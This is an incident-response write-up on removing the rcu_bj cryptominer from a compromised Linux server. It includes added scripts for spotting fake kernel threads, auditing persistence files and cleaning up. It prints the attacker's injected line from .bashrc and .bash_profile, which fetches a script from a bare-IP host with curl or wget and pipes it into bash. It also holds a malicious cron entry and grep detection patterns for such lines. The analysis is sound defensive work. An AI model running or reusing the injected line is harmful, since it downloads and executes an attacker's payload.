Notes on cleaning up the rcu_bj mining malware after it drove CPU usage through the roof

Author: 无味wy | Published 2023-04-29 22:57

    The entry point was most likely a GitLab vulnerability (recommendation: upgrade GitLab, or take it off the public internet).
    Monitoring reported sustained high CPU load on the server, so I logged in to investigate.
    Bash complained about /root/.bashrc and /root/.bash_profile the moment the SSH session opened (see below):

    [root@zbxserver ~]# ssh 192.168.64.8
    Last login: Sat Apr 29 18:48:51 2023 from 192.168.32.14
    -bash: /root/.bashrc: line 14: syntax error: unexpected end of file
    -bash: /root/.bash_profile: line 14: syntax error: unexpected end of file
    

    top shows rcu_bj consuming the CPU. Note the name: it is chosen to look like the kernel's own rcu_bh and rcu_sched threads, which appear a few lines further down the same listing.

    Tasks: 129 total,   1 running, 128 sleeping,   0 stopped,   0 zombie
    %Cpu(s): 50.0 us,  4.3 sy,  0.0 ni, 45.5 id,  0.2 wa,  0.0 hi,  0.0 si,  0.0 st
    KiB Mem :  8173780 total,   153720 free,  3089492 used,  4930568 buff/cache
    KiB Swap:        0 total,        0 free,        0 used.  2575292 avail Mem 
    
      PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND                                                                                                    
     1290 root      20   0 2438492 266040   2752 S  95.3  3.3   1022:12 rcu_bj                                                                                                     
     3649 root      20   0  556024  49620  10252 S   1.0  0.6 305:57.80 hosteye                                                                                                    
    32162 root      20   0  113540   1784   1268 S   0.7  0.0   8:55.98 sh                                                                                                         
     1053 work      20   0  799884  16432   4960 S   0.3  0.2  46:10.86 ral-agent                                                                                                  
     1054 work      20   0 1062904  13864   1572 S   0.3  0.2  75:48.77 php-cgi                                                                                                    
     8490 root      20   0   90652   2984   2108 S   0.3  0.0  40:59.38 rngd                                                                                                       
        1 root      20   0   51844   3756   2256 S   0.0  0.0 151:18.76 systemd                                                                                                    
        2 root      20   0       0      0      0 S   0.0  0.0   0:01.27 kthreadd                                                                                                   
        4 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 kworker/0:0H                                                                                               
        6 root      20   0       0      0      0 S   0.0  0.0  14:09.84 ksoftirqd/0                                                                                                
        7 root      rt   0       0      0      0 S   0.0  0.0   2:38.12 migration/0                                                                                                
        8 root      20   0       0      0      0 S   0.0  0.0   0:00.00 rcu_bh                                                                                                     
        9 root      20   0       0      0      0 S   0.0  0.0 259:29.46 rcu_sched                                                                                                  
       10 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 lru-add-drain                                                                                              
       11 root      rt   0       0      0      0 S   0.0  0.0   3:46.65 watchdog/0                                                                                                 
       12 root      rt   0       0      0      0 S   0.0  0.0   2:57.72 watchdog/1                                                                                                 
       13 root      rt   0       0      0      0 S   0.0  0.0   2:57.93 migration/1                                                                                                
       14 root      20   0       0      0      0 S   0.0  0.0  14:12.02 ksoftirqd/1                                                                                                
       16 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 kworker/1:0H                                                                                               
       18 root      20   0       0      0      0 S   0.0  0.0   0:00.00 kdevtmpfs                                                                                                  
       19 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 netns                                                                                                      
       20 root      20   0       0      0      0 S   0.0  0.0   0:21.82 khungtaskd                                                                                                 
       21 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 writeback                                                                                                  
       22 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 kintegrityd                                                                                                
       23 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 bioset                                                                                                     
       24 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 bioset                               
    
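    A user-space binary can call itself rcu_bj, but it cannot fake the properties of a real kernel thread: kernel threads are children of kthreadd (PID 2), have no executable behind /proc/PID/exe and an empty /proc/PID/cmdline (which is why ps shows them in brackets). The following POSIX shell script is an added example, not code from the original post; it checks those properties for every process whose name looks like a kernel thread. The list of name prefixes it treats as "kernel-looking" is my own heuristic, and the argument "scan" for the live run is a convention of this script.

```shell
#!/bin/sh
# Added example, not code from the original post: tell genuine kernel threads
# from user-space processes that borrow a kernel-thread name (as rcu_bj did).
# Genuine kernel threads are spawned by kthreadd (PID 2), have no executable
# behind /proc/PID/exe and an empty /proc/PID/cmdline; ps shows them in [brackets].

# classify_proc PID PPID EXE_TARGET COMM -> prints "user", "kernel" or "IMPOSTOR".
# The pattern list is a heuristic of my own: common kernel-thread name prefixes.
classify_proc() {
    pid=$1; ppid=$2; exe=$3; comm=$4
    case "$comm" in
        rcu_*|kworker/*|ksoftirqd/*|migration/*|watchdog/*|kswapd*|kthreadd|khungtaskd|kdevtmpfs)
            ;;                          # kernel-looking name: verify it below
        *)
            echo user; return 0 ;;      # ordinary name: out of scope for this check
    esac
    if [ -z "$exe" ] && { [ "$ppid" = 2 ] || [ "$pid" = 2 ]; }; then
        echo kernel                     # no binary on disk, child of kthreadd: genuine
    else
        echo IMPOSTOR                   # kernel-style name, but a file on disk or a user-space parent
    fi
}

# scan_running -> walks /proc and prints one line per impostor found
scan_running() {
    for d in /proc/[0-9]*; do
        pid=${d#/proc/}
        [ -r "$d/stat" ] || continue
        # /proc/PID/stat is "pid (comm) state ppid ..."; comm may contain spaces or parentheses
        comm=$(sed -n 's/^[0-9]* (\(.*\)) [A-Za-z] [0-9]* .*/\1/p' "$d/stat")
        ppid=$(sed -n 's/^[0-9]* (.*) [A-Za-z] \([0-9]*\) .*/\1/p' "$d/stat")
        exe=$(readlink "$d/exe" 2>/dev/null || true)
        if [ "$(classify_proc "$pid" "$ppid" "$exe" "$comm")" = IMPOSTOR ]; then
            echo "IMPOSTOR pid=$pid ppid=$ppid comm=$comm exe=${exe:-?}"
        fi
    done
}

# Run the live scan only when invoked as: sh kthread_check.sh scan
if [ "${1:-}" = scan ]; then
    scan_running
fi
```

    Run as root so /proc/PID/exe is readable for every process; as an unprivileged user the exe check degrades to the parent-PID check alone, which still flags rcu_bj because its parent is PID 1, not kthreadd.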

    Opening the two files shows the injected payload.
    Remove the injected line: a command that fetches a script from a bare IP address and pipes it straight into bash, as below, is unmistakably malicious. The syntax error at login is a side effect of that same line: the attacker's "(curl ... || wget ... | bash ..." never closes its opening parenthesis, so bash reaches end of file while still looking for the ")" and refuses to run that command. That is why the error is reported at line 14, one past the last line of each file.

    [root@localhost ~]#  vim /root/.bashrc
    # .bashrc
    
    # User specific aliases and functions
    
    alias rm='rm -i'
    alias cp='cp -i'
    alias mv='mv -i'
    
    # Source global definitions
    if [ -f /etc/bashrc ]; then
            . /etc/bashrc
    fi
    (curl -s http://123.30.179.206:8189/solr/.v7/booster || wget -q -O - http://123.30.179.206:8189/solr/.v7/booster | bash -sh >/dev/null 2>&1 &
    
    [root@localhost ~]# vim /root/.bash_profile
    # .bash_profile
    
    # Get the aliases and functions
    if [ -f ~/.bashrc ]; then
            . ~/.bashrc
    fi
    
    # User specific environment and startup programs
    
    PATH=$PATH:$HOME/bin
    
    export PATH
    (curl -s http://123.30.179.206:8189/solr/.v7/booster || wget -q -O - http://123.30.179.206:8189/solr/.v7/booster | bash -sh >/dev/null 2>&1 &
    
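    The injected line has two tell-tale traits that are easy to search for: a download tool whose output is piped into a shell, and a URL whose host is a bare IPv4 address. The script below is an added example, not code from the original post. It scans the usual persistence locations (shell start-up files, cron, rc.local, systemd units) for those traits, plus a third heuristic of my own: commands living under world-writable staging directories or under /usr/lib/sys, the non-standard directory this sample used. The sample file in the test reuses the exact line found above; the argument "audit" for the live run is a convention of this script.

```shell
#!/bin/sh
# Added example, not code from the original post: find lines of the kind that
# were injected into /root/.bashrc and /root/.bash_profile, in the places an
# attacker typically touches for persistence. All three patterns are heuristics.

# injected_lines FILE -> prints "lineno:line" for each suspicious line in FILE;
# exit status 0 if anything matched, 1 otherwise (plain grep semantics).
# Pattern 1: curl/wget whose output is piped into sh or bash
# Pattern 2: URL whose host is a bare IPv4 address
# Pattern 3: a path under /tmp, /var/tmp, /dev/shm, or the /usr/lib/sys directory this sample used
injected_lines() {
    f=$1
    [ -r "$f" ] || return 1
    grep -nE \
        -e '(curl|wget)[^|]*[|][[:space:]]*(ba)?sh' \
        -e 'https?://[0-9]{1,3}(\.[0-9]{1,3}){3}' \
        -e '(/usr/lib/sys|/dev/shm|/var/tmp|/tmp)/' \
        "$f"
}

# audit_persistence -> runs injected_lines over the usual start-up hooks and
# prints the file name followed by its suspicious lines
audit_persistence() {
    for f in /root/.bashrc /root/.bash_profile /root/.profile /home/*/.bashrc /home/*/.bash_profile \
             /etc/profile /etc/bashrc /etc/profile.d/* /etc/rc.local \
             /etc/crontab /etc/cron.d/* /var/spool/cron/* \
             /etc/systemd/system/*.service; do
        [ -f "$f" ] || continue
        hits=$(injected_lines "$f" || true)
        if [ -n "$hits" ]; then
            echo "== $f"
            printf '%s\n' "$hits"
        fi
    done
}

# Run the live audit only when invoked as: sh audit_persistence.sh audit
if [ "${1:-}" = audit ]; then
    audit_persistence
fi
```

    Expect the third pattern to produce some noise in /etc/profile.d (TMPDIR settings and the like); it is there to catch cron entries and unit files such as the "/usr/lib/sys/systemd" job found later in this write-up, and every hit should be read rather than deleted blindly.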

    This malware registers itself as an autostart service (here systemd_s.service, named to blend in with systemd's own units), so disable and stop that first; otherwise the processes are simply restarted after being killed.

    [root@localhost ~]#  systemctl disable systemd_s.service
    Removed symlink /etc/systemd/system/multi-user.target.wants/systemd_s.service.
    You have new mail in /var/spool/mail/root
    [root@localhost ~]#  systemctl stop systemd_s.service
    

    Now find the processes and kill them. Unless all three are killed, crontab -e exits immediately and the crontab cannot be edited. In the ps output the genuine kernel threads rcu_bh and rcu_sched appear in brackets with parent PID 2, whereas rcu_udev, rcu_libk and rcu_bj are files under /usr/lib/sys (not a standard directory) running under PID 1: rcu_udev is a shell script that starts rcu_libk, and rcu_bj is the miner itself at 90% CPU.

    [root@localhost ~]#  ps -ef|grep rcu
    root         8     2  0  2021 ?        00:00:00 [rcu_bh]
    root         9     2  0  2021 ?        02:58:05 [rcu_sched]
    root     22528 18979  0 19:51 pts/0    00:00:00 grep --color=auto rcu
    root     24392     1  0 00:58 ?        00:00:20 /bin/sh /usr/lib/sys/rcu_udev
    root     24461 24392  1 00:58 ?        00:12:46 /bin/sh /usr/lib/sys/rcu_libk
    root     25725     1 90 00:59 ?        16:58:48 /usr/lib/sys/rcu_bj
    [root@localhost ~]# kill -9 24392
    [root@localhost ~]# kill -9 24461
    [root@localhost ~]# kill -9 25725
    # wipe the program files (this truncates them in place; copy them elsewhere first if you want samples for analysis)
    [root@localhost ~]# cd /usr/lib/sys
    [root@localhost sys]#  cat /dev/null >rcu_bj
    [root@localhost sys]#  cat /dev/null >rcu_libk
    [root@localhost sys]#  cat /dev/null >rcu_udev
    [root@localhost sys]#  cat /dev/null >systemd
    # drop the page cache (optional: the memory held by the killed miner is already released, and "echo 3" covers what 1 and 2 do)
    [root@localhost sys]#  echo 1 > /proc/sys/vm/drop_caches
    [root@localhost sys]#  echo 2 > /proc/sys/vm/drop_caches
    [root@localhost sys]#  echo 3 > /proc/sys/vm/drop_caches
    # run crontab -e and delete the first line, the malware's job (the second line, the hosteye upgrade, is left in place)
    [root@localhost sys]# crontab -e
    */5 * * * * /bin/bash /usr/lib/sys/systemd
    */5 * * * * /opt/hosteye/bin/upgrade --upgrade_mode=8>/dev/null 2>&1
    

    This malware also stops the system logger. After cleaning up, bring it back with: sudo systemctl restart rsyslog
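    The whole sequence (stop the service, kill the processes, remove the files, fix the crontab, restart the logger) as one script. This is an added example, not code from the original post, and it departs from the manual steps above in three ways a responder usually wants: the files are copied into a quarantine directory with their SHA-256 before removal so a sample survives, the processes are matched on their command line (which also catches the "/bin/sh /usr/lib/sys/..." wrappers) instead of by reading ps by eye, and the crontab is filtered non-interactively instead of with crontab -e. The service, file and cron paths are the ones this sample used; the unit-file location /etc/systemd/system/systemd_s.service and the quarantine directory /root/quarantine are assumptions of this script, and the argument "run" is its own convention.

```shell
#!/bin/sh
# Added example, not code from the original post: the clean-up as reusable functions.
# Names under /usr/lib/sys, the cron pattern and systemd_s.service come from this
# incident; /etc/systemd/system/systemd_s.service and /root/quarantine are assumed.

# quarantine_file PATH DIR -> copy PATH into DIR, append its SHA-256 to DIR/hashes.txt, then remove it
quarantine_file() {
    src=$1; dir=$2
    [ -f "$src" ] || return 1
    mkdir -p "$dir"
    cp -p "$src" "$dir/$(basename "$src")"
    sha256sum "$src" >>"$dir/hashes.txt"
    rm -f "$src"
}

# kill_by_cmdline SUBSTRING -> SIGKILL every process whose command line contains
# SUBSTRING (the ELF miner and the "/bin/sh /usr/lib/sys/..." wrappers alike);
# prints how many processes were signalled
kill_by_cmdline() {
    pat=$1; n=0
    for d in /proc/[0-9]*; do
        pid=${d#/proc/}
        [ "$pid" = "$$" ] && continue
        cmd=$(tr '\0' ' ' <"$d/cmdline" 2>/dev/null || true)
        case "$cmd" in
            *"$pat"*) kill -9 "$pid" 2>/dev/null && n=$((n + 1)) ;;
        esac
    done
    echo "$n"
}

# purge_cron_lines FILE PATTERN -> print FILE with the lines matching PATTERN removed
purge_cron_lines() {
    grep -vE "$2" "$1" || true      # grep -v exits 1 when nothing is left; that is not an error here
}

# Full sequence for this sample. Run as root with: sh cleanup.sh run
if [ "${1:-}" = run ]; then
    q=/root/quarantine
    mkdir -p "$q"
    systemctl stop systemd_s.service 2>/dev/null || true       # stop the restarter before killing
    systemctl disable systemd_s.service 2>/dev/null || true
    echo "killed $(kill_by_cmdline /usr/lib/sys/) process(es)"
    for f in /usr/lib/sys/rcu_bj /usr/lib/sys/rcu_libk /usr/lib/sys/rcu_udev \
             /usr/lib/sys/systemd /etc/systemd/system/systemd_s.service; do
        quarantine_file "$f" "$q" || echo "not present: $f"
    done
    systemctl daemon-reload
    crontab -l >"$q/crontab.before" 2>/dev/null || true        # keep the original crontab too
    purge_cron_lines "$q/crontab.before" '/usr/lib/sys/' | crontab -
    systemctl restart rsyslog                                  # the sample had stopped the logger
fi
```

    The order matters: the service is stopped before the kill so nothing respawns in between, and the crontab is rewritten after the processes are gone because, as noted above, crontab refuses to run while they are alive. The hosteye line survives the filter because it does not mention /usr/lib/sys.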

          Original link: https://www.haomeiwen.com/subject/bcywjdtx.html